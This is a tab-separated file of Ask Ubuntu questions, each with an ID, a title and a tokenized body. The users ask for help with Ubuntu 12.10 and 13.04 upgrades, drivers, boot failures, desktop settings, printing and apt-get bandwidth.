285405	how can i uninstall the new ubuntu one systray indicator ?	i though the new ubuntu one indicator for 13.04 would mean good news , but the truth is that i think it 's not as good as the one i use in 12.10 . is there some way of removing it and just keep the one i all ready use ? right now i got two identical cloud icons in the systray and it 's just redundant .
285414	upgrading to 12.10 and 13.04	last week i tried to upgrade from 12.04 lts to 12.10 and it stopped loading ubuntu . i had to do a full uninstall and reinstall 12.04 onto my dual boot windows 8 system . i did n't figure out why it did that or anything through my searches , but it would just boot to a black screen . it would show the ubuntu loading screen , but become a black , backlit screen afterward and would n't go to the log in screen . i 'm hoping to avoid that happening again , but it does n't look like i can upgrade to 13.04 without going through the 12.10 process again . since that did n't work before , i do n't want to try again and have to reinstall the os a third time . is there any way to bypass this or can anyone tell me what might have happened when i upgraded before so i can avoid it again ? i have intel hd graphics on my laptop ( dell nspiron n5040 ) and did n't have any proprietary drivers that needed installing . all of the updates were done when the problem happened with 12.10 , and they are currently up to date again .
285415	how to debug ldap addressbook connection in evolution	when searching an address book on an active directory i get the error : can not get contact list : ldap error 0x1 ( operations error ) how can i get more detailed information ?
285417	internet speed and download speed is low	when i installed ubuntu on my laptop i have find out that every time i download something , the download speed is very low . i thought that maybe it 's overload on the internet or something in company , but today when i was installing ubuntu 13.04 it was downloading by speed 14.5 kb/sec max speed it get was 20.3 kb/sec so i used my sister 's laptop , she uses windows 7 and tried to install , i found out that her laptop download speed was 200+ kb/sec . so i said , maybe its the position and wireless stuff . i put my laptop on my lap and it 's better than her in the same position and i paused download on her lap and start on mine and also very low download speed on my lap . and it happened with me before , i tried to download a movie and my download speed was very low , but on windows it 's 200+ and 300+ kb/sec . how can i fix this ?
285418	upgrading from 12.10 wubi install to 13.04	ubuntu has discontinued wubi.exe and i know that when you install the ubuntu 13.04 developer version with wubi you can only login as a guest . i have previously installed ubuntu 12.10 with wubi.exe if i upgrade to 13.04 will everything work normally ?
285419	what does it mean by if if you have a pc with the windows 8 logo or uefi firmware , choose the 64-bit download	i have dual booted my acer aspire one d257 which has an intel atom n570 1gb of ram net book with windows 8 and ubuntu 13.04 . which operating system shall i upgrade my pc to the 32 bit or 64bit , my laptop came with 32 bit but what confuses me is that it is on the download page if you have a pc with the windows 8 logo or uefi firmware , choose the 64-bit download . the thing is that my pc is 64 bit capable . which operating system should i choose . please list your answer with reasons why . my laptop came with 32-bit and has 32 bit windows 8. luckily , my laptop processor is 64bit based .
285421	how to make the brightness keys work on an hp folio 13 ?	in my hp folio 13 laptop with ubuntu 13.04 the brightness control works with the slider in the system brightness & lock settings , but the brightness function keys do n't . also , the brightness level is set to maximum on every boot . is there a way to make them work and make the system keep the brightness level set in the previous session ? some information about my laptop concering this issue : ls /sys/class/backlight intel_backlight ls /sys/class/backlight/*/brightness /sys/class/backlight/intel_backlight/brightness lspci | grep -i vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) uname -a linux folio13 3.8.0-19-generic # 29-ubuntu smp wed apr 17 18:16:28 utc 2013 x86_64 gnu/linux
285424	first time using ubuntu not sure the installation is correct	so i got fed up with microsoft and decided i was going to start using exclusively open source products . very little experience outside the windows os environment so i picked ubuntu which i thought would be a good starting point . i created the iso disk and deleted windows . i began running ubuntu and encountered some things during installation which i was unsure about . first off i got a message stating i had n't created /boot . so i went back and fumbled my way through that . then i got a message saying i had n't created /swap . i went back to try and do that , but i got an entirely new prompt and when i clicked it it completed the installation . all was fine but then i tried to install solaris . when my machine restarted i got an error saying that there was no bootable media and that i needed to enter a bootable disk etc ... i removed the solaris disk and tried several times to restart . each time getting the same message about no bootable media . i tried using the ubuntu iso and kd bootdisk and still got the same error message . there was no command prompt and no way to format . i went into bios and changed the boot order and it still would not boot from cd . this morning i opened my computer and when i brought it out of hibernation it went straight to the ubuntu desktop . i am guessing that i did not properly configure something during the install but i do not understand why , when even with a bootdisk entered it would not boot from the disk . now when i try and access my hdd from ubuntu desktop i get the error message unable to mount location . ca n't mount file . i see when i open the file system folder there is a boot folder . so long story short is there some way to check my installation or to get detailed install instructions and i will just reinstall .
285426	grub-efi and raring	so i downloaded ubuntu raring , and setup a usb install drive for my lenovo u410 . i had a fully working 12.10 install on the computer but went with a custom partitioning scheme . i formatted the ext4 partition on my 30gb ssd and mounted it as / i then mounted the existing 1tb ext4 partition as /home the installation went through fine , however when rebooting the computer it goes to the multiboot menu , where i can see boot from usb , sdd , hdd , and pci . when i select any , i get a screen from the bios showing the pci controller and the patent numbers , after a few seconds i see 'media test failed ' and the computer reverts back to the multiboot menu . i still have a 256mb fat32 patition on my ssd along side ubuntu , it 's labelled as efi . also when i boot from usb it uses grub-efi . is this a hardware problem with my laptop that just arose in the ten minutes it took to install ubuntu or is it a software issue that can be fixed ?
285428	how to change the color of the window outline in spread and switcher ?	staring with ubuntu 13.04 , the outline around windows when scale/spread ( super+w ) and the switcher ( when viewing different windows of an application using alt+` ) are invoked is red . see the pictures below . the outline stays red even when i change themes . using the compizconfig settings manager i can change the color of the outlines that appear when expo is invoked , windows are set into a grid , and windows are resized , but i ca n't find an option for scale/spread or the switcher . how can i change the outline 's color ?
285434	is there a power saving application similar to jupiter ?	i have installed the 13.04 final release and so far i am loving it more 12.10 . i 'm trying to install the jupiter power settings app but , i read it is no longer compatible with the new kernel . is there a similar program or a way to manage the power settings on 13.04 ?
285437	are the privacy controls only for unity ?	sorry for my ignorance , i am new to linux . i 've read on the web , that unity spied and sent some data for `` statistics '' and such . also i 've read the privacy controls wo n't be in 13.04 . so what i am wondering about is - does ubuntu 13.04 ( with unity ) sends your data somewhere for `` whatsoever reason '' ? and if yes , what about the alternative desktops ( lubuntu , xubuntu , etc . )
285438	ubuntu catastrophe after upgrading to ubuntu 13.04	i was eager to try the new ubuntu 13.04 released today so i updated though the update-manager , sadly it becaume such a catastrophe . after rebooting the screen went black without me letting switch to a tty or anything . i tried to switch from lightdm to gdm due to some related issues i read without any luck . i also tried booting with linux 3.5 kernel and well , it boots succesfully , but there are a ton of bugs . the system font is messed up , gnome does not work properly , almost every app force closes , ubuntu errors pops out every now and then prompting me to report them , old problems that were already solved are now back although the solution i coded is still there ... i guess it would take me more time to solve every bug than to make a new clean installation of ubuntu . prior to that i could make a backup of my files . what method would be the best for that ? and then to the installing part . i guess the easiest way would be to boot from a usb/dvd , the bad part is that my laptop does not have a dvd drive and currently i do n't have a big enought usb . is it possible to mount the ubuntu .iso from ubuntu itself and restore the system ? or maybe an alternative solution ... a friend told me he could lend me a big enough usb so i could do the usb installation but if there is a solution that does not involve all my applications/configurations/files lost it would be perfect . lastly , should i install 12.10 or 13.04 ? i believe the problems came due to the update though update-manager so a clean installation should not cause any troueble , should it ? thanks in advance .
285443	print errors for brother hl-5340d on ubuntu 12.10 / 13.04	our printer ( brother hl-5340d ) does not print correctly on ubuntu 12.10/13.04 . almost every print-job looks like this : example of faulty print job as you can see , the printer is possessed : ) . despite that , everything works fine on 12.04 and older versions . the drivers ( brother hl-5350 dn br-script3 ) are the same for 12.04 and 12.10/13.04 . test-pages are printed correctly . sometimes we also get an extra page that looks like this : error : undefined offending command : ... .undefined stack : ( numbers ) how can i fix this behavior ?
285447	do i have to uninstall nvidia drivers before replacing with an amd gpu ?	here is the setup : old intel motherboard ( dg33fb ) with pci-x 1.0 2 gb ddr2 system memory 580 w psu intel core 2 quad 2.4 ghz here are the observations* : i had thought there was no post or bios but if i press f2 even without seeing , bios does show up . post and bios screens are invisible . system hangs after bios with code on the bottom left `` 0_ '' . the gpu and psu are fine based on my visit to the store i bought the gpu at . i do n't want to recklessly spend more money for desperate fixes . is is possible that it is n't booting because it 's having conflict with the gpu drivers ? please help . thanks .
285453	ubuntu wo n't shutdown using integrated gpu ( vaio vpcsb )	i have a sony vaio vpcsb1d7e ( w7 + ubuntu 12.04 ) . it has hybrid graphics ( amd+intel ) . i installed both the amd catalyst drivers and the intel ones . so far , using both graphic cards works fine , but i have a problem when using the intel card . i can not properly shutdown my laptop when i select the intel card . it actually works well when using it . then , when i shutdown the laptop , the console appears showing the shutdown process and stops in the line `` shutdown laptop mode '' . then , i have to long-press the shutdown button to switch off the laptop . this only happens when using intel 's card , not amd . please let me know what appropriate logs would be useful to try to solve this problem . thanks !
285455	how to migrate ubuntu/windows 7 dualboot from hdd to hdd+ssd without reinstall ?	i have a working dual-boot setup ( ubuntu 12.10 and win7 ) on my laptop . i got a 320gb hdd with partitions for / , /home , swap , winsys and a big windata partition . there 's more than 250gb space occupied overall . now i bought a 250gb ssd which i will put in my ultrabay , and i want to migrate all the partitions except the big data partition onto the ssd , enlarge them in a controlled manner according to ssd space , leave windata on the hdd , and expand it to the whole size . i want to avoid a fresh installation of both ubuntu and windows . i read quite much already , but i 'm unsure what the best way to accomplish this is ? clonezilla disk-to-disk clone is out , because the target disk is smaller . clonezilla partitions-to-partitions ( omitting the data partition ) seems to be a way , but i can only enlarge the partitions proportionally ( even if i can ) , and i do n't know if this will create proper ssd partition alignment . also , what about the boot sector/boot loader , especially w.r.t . dualboot ? the sanest way seems to be to use gparted from a live cd , create the partitions on the ssd as desired , then copy the hdd partitions into the new ones , and expand the data partition on the hdd . this seems to me the most uncomplicated way - gparted can do proper alignment , but i do n't know if the boot loader can be copied , too ? also , if this works , why does everybody seem to recommend clonezilla ? my boot partition is the first partition ( sda1 ) , where the windows system resides on . will doing this purely in gparted work ? can i safely drop the extended partitions setup ( which i do n't need anymore because now i only got 4 partitions per disk ) ? or should i keep that around anyway if i want to further subdivide in the future ( for a scratch disk etc ) bonus question : my /home is still ext2 - can i make the new /home ext4 , and copy the ext2 partition over , and it wo n't break ? i 'm aware that i 'll have to rewrite the /etc/fstab to adjust the uuids , and that i 'll probably need a windows rescue disk to `` repair '' the confused windows boot system . any further pitfalls ? fdisk -l output : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x80d2f3ee device boot start end blocks id system /dev/sda1 * 63 104856254 52428096 7 hpfs/ntfs/exfat /dev/sda2 184538655 625137344 220299345 7 hpfs/ntfs/exfat /dev/sda3 104856255 136311524 15727635 83 linux /dev/sda4 136311649 184538654 24113503 5 extended /dev/sda5 148890420 184538654 17824117+ 83 linux /dev/sda6 136311651 148874354 6281352 82 linux swap / solaris partition table entries are not in disk order
285461	how to get nautilus `` real '' compact mode in ubuntu 13.04 ?	ubuntu 13.04 have fully absent compact mode . nautilus allows only icon view and list view . list view is n't the same as compact mode - well , it 's easy to switch off unneeded columns , but what about multicolumn files display ? is it possible to return habitual compact mode back ?
285463	bcm 4312 lp-phy card does n't detect any wireless networks	i installed ubuntu 12.04 on my dell inspiron with bcm4312 802.11/b/g ( lp_phy ) wlan card , installation was followed by errors about missing firmware so to fix it i installed firmware-b43-lpphy-installer , after that it detects my wlan card but it does n't detect any wireless networks it 's using b43-pci-bridge , however it detects few wireless networks with wl driver sometimes but wifi switch does't respond then and card is working well with windows7 i even followed these instructions to install firmware provided by broadcom but no success and now i have no idea what could be the problem and how to fix it
285466	ubuntu 13.04 - some empathy plugins do n't work	i observed on newly installed ubuntu 13.04 that only google plugin used in empathy . meanwhile i have some additional plugins : icq . contacts not shown in empathy . detail card in network accounts is empty so i draw a conclusion that problem with icq deeper . facebook . contacts not shown in empathy . detail card in network accounts looks well . what 's up with these plugins ?
285467	can i delete libdrm.so files ?	in my ubuntu 12.10 /usr/lib/ folder , there are some files like libdrm.so.2.4.0 , libdrm.so.2 . what are they used for ? can i delete them ?
285477	how can i change window managers in 13.04 ?	there used to be an option in the login area ( lightdm ) that allowed you to choose window managers , but that option seems to have disappeared in 13.04 . i installed awesome wm , but ubuntu is not giving me the option of switching to it .
285478	how do i open the dash when a fullscreen application has the focus ? ( 12.10 13.04 )	when i press the `` windows '' key the dash normally opens . when i press it when a fullscreen window has the focus , it does n't seem to do anything . how do i open the dash when a fullscreen window has the focus ? i have seen this problem in 12.10 and 13.04 with unity3d .
285481	how to install iceweasel ?	i was searching for firefox-like browsers ( 'clones ' ) and found about a few that i want to test , but could not install iceweasel in ubuntu . ( older links that i found with this google search - here and here - are outdated/dead . ) is it possible ? where to download the package from ? in fact finding the package is enough for me - i think that , just like firefox , swiftweasel and seamonkey , these kind of browsers are able to run very well as 'portable ' ( just running the executable in the package folder ) . i was searching for this browser to use it as another 'firefox clone ' ( in the sense described in the linked question , like icecat ) . but it seems that iceweasel may refer to two different projects . one is the former name of gnu icecat , the other is a debian project . more here . when i asked the question , this difference was not clear to me , and icecat was already running on my computer . so , i wonder if iceweasel debian version has its place on ubuntu or not .
285482	how to reduce the size of apt-get update list on a development release once it has been released as stable ?	i have been using the development version of 13.04 since early march . in development release , the general behavior of running the sudo apt-get update command is to download the list files completely if they have been changed . whereas , if one uses the stable version of ubuntu , the command just downloads the diff of the list files if they have been changed ( rsync style ) . basically , in development versions sudo apt-get update downloads about 17-18 mb of data ; whereas in stable versions only about 1 mb of data gets downloaded ( except for the initial run ) . now since 13.04 has been released as stable , i would like to change the behavior of sudo apt-get update to mimic its normal behavior in a stable release . how do i make this happen ? a similar question but for the stable release was earlier asked on ask ubuntu : the size of apt-get update lists is too big however , it was a bug in 12.04 which got fixed later on . but the answers given there are not feasible in my case . for ubuntu+1 its not a bug , its a general behavior of development releases . anyways , i would go through the answers provided there : the answer by john s gruber asks to touch the relevant files before i run the command ( sudo apt-get update ) everytime . it 's definitely not feasible in my case . that answer was okay for that question since it was a bug in 12.04 and it provided a temporary fix in that situation . the answer by chan-ho suh asks to change the update mirrors . this would n't solve the problem in a development release . the answer by anwar was also a temporary fix for that situation . it assumes i would run sudo apt-get update command only after adding a ppa and so asks to disable the other repositories . this is not feasible in my case since i obviously want to update all the repositories . i do n't necessarily run this command only after adding a ppa . i run this command on a daily basis to install any updates released by canonical . i use sudo apt-get update as a subsitute for software center . so here it is . how do i restore the normal behavior of sudo apt-get update command to download only the diff of the changed files ? hopefully , the same solution would work for software center as well , since software center also consumes similar amount of bandwidth if i update using it . i definitely do not want to re-install 13.04 just to restore this behavior . output of sudo apt-get update in case it matters : $ sudo apt-get update hit http : //dl.google.com stable release.gpg hit http : //dl.google.com stable release hit http : //ppa.launchpad.net raring release.gpg hit http : //dl.google.com stable/main i386 packages hit http : //linux.dropbox.com precise release.gpg hit http : //ppa.launchpad.net raring release.gpg get:1 http : //mirror.picosecond.org raring release.gpg [ 933 b ] hit http : //ppa.launchpad.net raring release hit http : //linux.dropbox.com precise release get:2 http : //mirror.picosecond.org raring-updates release.gpg [ 933 b ] hit http : //ppa.launchpad.net raring release hit http : //linux.dropbox.com precise/main i386 packages hit http : //ppa.launchpad.net raring/main i386 packages get:3 http : //mirror.picosecond.org raring-backports release.gpg [ 933 b ] ign http : //dl.google.com stable/main translation-en_in ign http : //dl.google.com stable/main translation-en hit http : //mirror.picosecond.org raring-security release.gpg get:4 http : //mirror.picosecond.org raring release [ 40.8 kb ] hit http : //ppa.launchpad.net raring/main i386 packages get:5 http : //mirror.picosecond.org raring-updates release [ 40.8 kb ] get:6 http : //mirror.picosecond.org raring-backports release [ 40.8 kb ] ign http : //linux.dropbox.com precise/main translation-en_in ign http : //linux.dropbox.com precise/main translation-en hit http : //mirror.picosecond.org raring-security release get:7 http : //mirror.picosecond.org raring/main sources [ 963 kb ] ign http : //ppa.launchpad.net raring/main translation-en_in ign http : //ppa.launchpad.net raring/main translation-en ign http : //ppa.launchpad.net raring/main translation-en_in ign http : //ppa.launchpad.net raring/main translation-en get:8 http : //mirror.picosecond.org raring/restricted sources [ 5,987 b ] get:9 http : //mirror.picosecond.org raring/universe sources [ 5,838 kb ] get:10 http : //mirror.picosecond.org raring/multiverse sources [ 171 kb ] get:11 http : //mirror.picosecond.org raring/main i386 packages [ 1,168 kb ] get:12 http : //mirror.picosecond.org raring/restricted i386 packages [ 9,623 b ] get:13 http : //mirror.picosecond.org raring/universe i386 packages [ 5,405 kb ] get:14 http : //mirror.picosecond.org raring/multiverse i386 packages [ 131 kb ] hit http : //mirror.picosecond.org raring/main translation-en hit http : //mirror.picosecond.org raring/multiverse translation-en hit http : //mirror.picosecond.org raring/restricted translation-en get:15 http : //mirror.picosecond.org raring/universe translation-en [ 3,736 kb ] get:16 http : //mirror.picosecond.org raring-updates/main sources [ 1,616 b ] get:17 http : //mirror.picosecond.org raring-updates/restricted sources [ 14 b ] get:18 http : //mirror.picosecond.org raring-updates/universe sources [ 14 b ] get:19 http : //mirror.picosecond.org raring-updates/multiverse sources [ 14 b ] get:20 http : //mirror.picosecond.org raring-updates/main i386 packages [ 3,331 b ] get:21 http : //mirror.picosecond.org raring-updates/restricted i386 packages [ 14 b ] get:22 http : //mirror.picosecond.org raring-updates/universe i386 packages [ 1,078 b ] get:23 http : //mirror.picosecond.org raring-updates/multiverse i386 packages [ 14 b ] hit http : //mirror.picosecond.org raring-updates/main translation-en hit http : //mirror.picosecond.org raring-updates/multiverse translation-en hit http : //mirror.picosecond.org raring-updates/restricted translation-en hit http : //mirror.picosecond.org raring-updates/universe translation-en get:24 http : //mirror.picosecond.org raring-backports/main sources [ 14 b ] get:25 http : //mirror.picosecond.org raring-backports/restricted sources [ 14 b ] get:26 http : //mirror.picosecond.org raring-backports/universe sources [ 738 b ] get:27 http : //mirror.picosecond.org raring-backports/multiverse sources [ 14 b ] get:28 http : //mirror.picosecond.org raring-backports/main i386 packages [ 14 b ] get:29 http : //mirror.picosecond.org raring-backports/restricted i386 packages [ 14 b ] get:30 http : //mirror.picosecond.org raring-backports/universe i386 packages [ 508 b ] get:31 http : //mirror.picosecond.org raring-backports/multiverse i386 packages [ 14 b ] hit http : //mirror.picosecond.org raring-backports/main translation-en hit http : //mirror.picosecond.org raring-backports/multiverse translation-en hit http : //mirror.picosecond.org raring-backports/restricted translation-en hit http : //mirror.picosecond.org raring-backports/universe translation-en hit http : //mirror.picosecond.org raring-security/main sources hit http : //mirror.picosecond.org raring-security/restricted sources hit http : //mirror.picosecond.org raring-security/universe sources hit http : //mirror.picosecond.org raring-security/multiverse sources hit http : //mirror.picosecond.org raring-security/main i386 packages hit http : //mirror.picosecond.org raring-security/restricted i386 packages hit http : //mirror.picosecond.org raring-security/universe i386 packages hit http : //mirror.picosecond.org raring-security/multiverse i386 packages hit http : //mirror.picosecond.org raring-security/main translation-en hit http : //mirror.picosecond.org raring-security/multiverse translation-en hit http : //mirror.picosecond.org raring-security/restricted translation-en hit http : //mirror.picosecond.org raring-security/universe translation-en ign http : //mirror.picosecond.org raring/main translation-en_in ign http : //mirror.picosecond.org raring/multiverse translation-en_in ign http : //mirror.picosecond.org raring/restricted translation-en_in ign http : //mirror.picosecond.org raring/universe translation-en_in ign http : //mirror.picosecond.org raring-updates/main translation-en_in ign http : //mirror.picosecond.org raring-updates/multiverse translation-en_in ign http : //mirror.picosecond.org raring-updates/restricted translation-en_in ign http : //mirror.picosecond.org raring-updates/universe translation-en_in ign http : //mirror.picosecond.org raring-backports/main translation-en_in ign http : //mirror.picosecond.org raring-backports/multiverse translation-en_in ign http : //mirror.picosecond.org raring-backports/restricted translation-en_in ign http : //mirror.picosecond.org raring-backports/universe translation-en_in ign http : //mirror.picosecond.org raring-security/main translation-en_in ign http : //mirror.picosecond.org raring-security/multiverse translation-en_in ign http : //mirror.picosecond.org raring-security/restricted translation-en_in ign http : //mirror.picosecond.org raring-security/universe translation-en_in fetched 17.6 mb in 3min 46s ( 77.7 kb/s ) reading package lists ... done contents of /etc/apt/sources.list in case it matters : # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //mirror.picosecond.org/ubuntu/ raring main restricted deb-src http : //mirror.picosecond.org/ubuntu/ raring main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //mirror.picosecond.org/ubuntu/ raring-updates main restricted deb-src http : //mirror.picosecond.org/ubuntu/ raring-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //mirror.picosecond.org/ubuntu/ raring universe deb-src http : //mirror.picosecond.org/ubuntu/ raring universe deb http : //mirror.picosecond.org/ubuntu/ raring-updates universe deb-src http : //mirror.picosecond.org/ubuntu/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //mirror.picosecond.org/ubuntu/ raring multiverse deb-src http : //mirror.picosecond.org/ubuntu/ raring multiverse deb http : //mirror.picosecond.org/ubuntu/ raring-updates multiverse deb-src http : //mirror.picosecond.org/ubuntu/ raring-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //mirror.picosecond.org/ubuntu/ raring-backports main restricted universe multiverse deb-src http : //mirror.picosecond.org/ubuntu/ raring-backports main restricted universe multiverse deb http : //mirror.picosecond.org/ubuntu/ raring-security main restricted deb-src http : //mirror.picosecond.org/ubuntu/ raring-security main restricted deb http : //mirror.picosecond.org/ubuntu/ raring-security universe deb-src http : //mirror.picosecond.org/ubuntu/ raring-security universe deb http : //mirror.picosecond.org/ubuntu/ raring-security multiverse deb-src http : //mirror.picosecond.org/ubuntu/ raring-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu raring partner # deb-src http : //archive.canonical.com/ubuntu raring partner # # uncomment the following two lines to add software from ubuntu's # # 'extras ' repository . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu raring main # deb-src http : //extras.ubuntu.com/ubuntu raring main
285487	a couple of multitouch gestures are not working in 13.04 compared to 12.04	the three finger pinch and zoom as well as the three fingers to move the window are not working in 13.04 . any ideas on how to fix this . my computer is the i5 acer aspire s7 .
285491	will conventional programs run on ubuntu touch ?	i 'm verry happy about the massage , that we will get a tablet version for ubuntu ! now i ask myself if the conventional programs like libreoffice , openoffice , vlc player , thunderbird or other run on ubuntu tablet ? or will be there the same problems like windows has with windows rt , that it is required to have a version of the program that is programmed only for tablets .
285493	how to show full date and time in nautilus/files 3.6+ list view ?	the list view of nautilus 3.6 shows the dates files were modified in a variety of ways : the hour and minute if modified on the current day , and the month and day if modified during the current year , and the year tacked on if modified during a previous year . i would like to see the entire date and time consistently on all the files ( e.g . : sat 20 apr 2012 01:28:34 pm edt ) . i had this set up before , but i ca n't figure out how to do so with version 3.6 . i did find this question , but the answers no longer apply to nautilus 3.6 : how to change the date format in nautilus list columns ? how can i do so in nautilus 3.6+ ?
285495	what version do i download for my mac ?	i am trying to get it on my mac , so do i download the windows version onto a usb and then upload it from there because i ca n't find a mac version .
285497	why ca n't i connect to my wireless network at work ?	i can connect at home , but not at work . i can see the ssid , but it wo n't connect . i do n't see any errors using dmesg either when trying to connect .
285500	ubuntu nexus 7 - daily pre-installed - tegra 3 driver	i 've just installed ubuntu 13.04 on my nexus 7 tablet using the daily pre-installed image build . it works , but the screen is very very slow , and when i see the details , graphics says unknown . is there a driver i can install for this ?
285504	install oracle ses in ubuntu	hi all ! i 'm new in ther neighboord so i need to ask some directions . i was learning ubuntu and i need to use it for a `` test server '' of oracle ses . i already downloaded the ses in here : http : //www.oracle.com/technetwork/topics/search/downloads/linuxx8664soft-085433.html but ca n't manage to install ... ( remember i 'm a greenhorn ) . ( i 'm using ubuntu 12.04 )
285505	create native gnome menus	how does one use gnome native elements ? for example empathy can : create pop-ups with text-boxes and pictures . right clicking on the top-left icon produces a menu . the system tray the system tray icon also has a `` gnome-type ? '' pop-up when left clicked which looks and acts better then other apps with system tray icons . is there a tool kit or something ? i am particularity interested in python bindings but any info is helpful . it may without saying but this is gnome 3 . edit : these features can be found in most gnome apps , not just empathy . here 's a decent example . thanks in advance .
285506	how to block websites in ubuntu ?	i have added a site in my hosts file but its not working , please view the pics . my hosts file 127.0.0.1 localhost 127.0.1.1 ubuntu.local ubuntu 127.0.0.1 dailymotion.com *.dailymotion.com http : //www.dailymotion.com* # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters as added in hosts file the site is blocked copy paste the video link ... .site is not block how do i block each and every link that has http : //dailymotion.com/ i have tried with 0.0.0.0 dailymotion.com to hosts file , nothing work..but in windows 7 & windows 8 its working perfectly not interested in weird iptables commands thanks thanks to achu
285512	how to change function ( fn ) key behavior on wireless logitech keyboard	i do have a wireless logitech k750 keyboard ( silver mac version ) connected to a lenovo thinkpad ( via the unifying usb receiver , together with a wireless logitech mouse m705 ) and currently running ubuntu 12.04 . by default the f-keys are mapped as multimedia/function keys , e.g . play /pause . as i do n't use them very often , i want the f-keys to behave like the `` real '' f-keys ( f1-f12 ) . how can i do that ? i know there is an option in the bios settings , but this only toggles the built-in keyboard of the notebook , not on my wireless keyboard . i know there is a way to change this for the apple wireless keyboard ( applekeyboard # change_function_key_behavior ) , but there is no `` parameters '' directory in /sys/module/hid_logitech_dj/ . any ideas ? or is there maybe a way to do this in a later ubuntu version ( 13.04 ) ? update : lsusb -d 046d : shows bus 002 device 005 : id 046d : c52b logitech , inc. unifying receiver update 2 : thanks a lot for your help lekensteyn . finally solaar works just fine . in the `` known issues '' of solaar it says that it does not work with the nano receiver . but i have one and it works just fine . just do n't forget to read the installation instructions and run the rules.d/install.sh script . it also recognized my m705 mouse .
285515	unity launcher icons gets fuzzy when on odd numbered setting	fuzzy icons when odd number-sized in launcher bar - unity description of the problem when entering the appearance settings in the system tools , you can change the unity icon-size with a slider . when making this slider go on odd numbers ( e.g . 41 , 43 , 39 ) , go can note a notable difference in the quality of the icons . this is because the launcher is saving resources on the quality when having smaller icons on the unity-bar , but why is unity doing this on all the odd-numbered sizes ? question how can i make the icons remain big-resolouted when making odd-numbered icon-size ? i have attached 2 screenshots to describe my problem where i used 40 and 39 as setting on the slider . and you might want to zoom in on the pictures to watch the difference . and i am probably considering this as a bug ; in 13.04 .
285520	i 'm installing ubuntu but stuck	i 've partitioned by hard drive , does that mean i have to put the program on my usb or cd whichever i choose . the instructions i was looking at about partitioning just ended so i 'm not sure what to do after this .
285525	dash background/blur problem	i have a problem with the dash 's background in raring , instead of blur it shows a greenish pattern . this happens with both active and static blur ( installed unity tweak tool to try these ) . no blur works well but it is confusing , it makes everything hard to read . i have an onboard ati radeon xpress x1250 graphics card . i have n't installed closed source drivers ( none of them show up in the additional drivers section of system settings ) . the launcher and the panel also have this problem but only when the dash is open , otherwise they are fine . precise and quantal work fine , i only face this problem in raring . is there anything i can do to fix this other than revert to precise ?
285536	ubuntu became kubuntu after upgrading to 13.04 !	i recently updated my ubuntu 12.10 setup to 13.04 using sudo do-release-upgrade . after going through the process and rebooting , i was a little confused by the grub menu showing a `` kubuntu '' option instead of `` ubuntu '' as it usually did . after choosing it , it then shows me a kubuntu splash screen during the bootup ( consisting just of a blue `` kubuntu '' ) , but the subsequent login screen and desktop are fine . i do have a kde setup besides unity ( i had installed kubuntu-desktop way earlier when i was running 12.04 ) , but i do n't see why it should have affected the grub menu and the bootup splash screen !
285538	i ca n't boot my windows installer	i 'm trying to install windows 8 because i removed it accidentally . what i 've tried : extracted iso and added the boot flag within ubuntu extracted iso using poweriso within windows 7 ( other computer ) change boot order what happens when it starts : no video mode activated loading linux 3.8.0-10-generic loading initial randisk ubuntu 13.04 beta 2 i 've done this always and worked successfully , also i tried different iso 's and same happens .
285539	detect and mount devices ?	i upgraded ubuntu today and everything works smooth except that ubuntu does n't detect any other storage devices . my / and /home partitions work fine , but my other partitions are just not detected . i would n't mind , except the same problem goes with usb sticks . when i plug in a usb stick , the light goes on , but the computer detects nothing . just to be clear , my mouse and keyboard are connected via usb and work fine . any idea how to solve this issue . none of the suggestions i found on the internet have any effect . thank you , calixte
285542	convert .mov files to home theater compartible mp4	i have bunch of mov files and i want to play them on my sony dvd home theater ( xvid/hdmi capable ) but i can not . i have tried different configuration in winff ( ffmpeg frontend ) but does not work . the player complains video frame rate is not supported . here are informations from mplayer . detected file format : quicktime/mpeg-4/motion jpeg 2000 format ( libavformat ) [ lavf ] stream 0 : video ( h264 ) , -vid 0 [ lavf ] stream 1 : audio ( aac ) , -aid 0 , -alang eng video : [ h264 ] 720x576 24bpp 29.970 fps 1249.0 kbps ( 152.5 kbyte/s ) clip info : major_brand : isom minor_version : 512 compatible_brands : isomiso2avc1mp41 creation_time : 2006-12-22 01:43:44 encoder : lavf53.21.1 load subtitles in . failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory [ vdpau ] error when calling vdp_device_create_x11 : 1 [ ass ] auto-open ========================================================================== opening video decoder : [ ffmpeg ] ffmpeg 's libavcodec codec family asking decoder to use 2 threads if supported . selected video codec : [ ffh264 ] vfm : ffmpeg ( ffmpeg h.264 ) ========================================================================== ========================================================================== opening audio decoder : [ ffmpeg ] ffmpeg/libavcodec audio decoders audio : 48000 hz , 2 ch , s16le , 112.0 kbit/7.29 % ( ratio : 14000- > 192000 ) selected audio codec : [ ffaac ] afm : ffmpeg ( ffmpeg aac ( mpeg-2/mpeg-4 audio ) ) ========================================================================== [ ao oss ] audio_setup : ca n't open audio device /dev/dsp : no such file or directory ao : [ alsa ] 48000hz 2ch s16le ( 2 bytes per sample ) starting playback ... a : 0.0 v : 0.0 a-v : 0.000 ct : 0.000 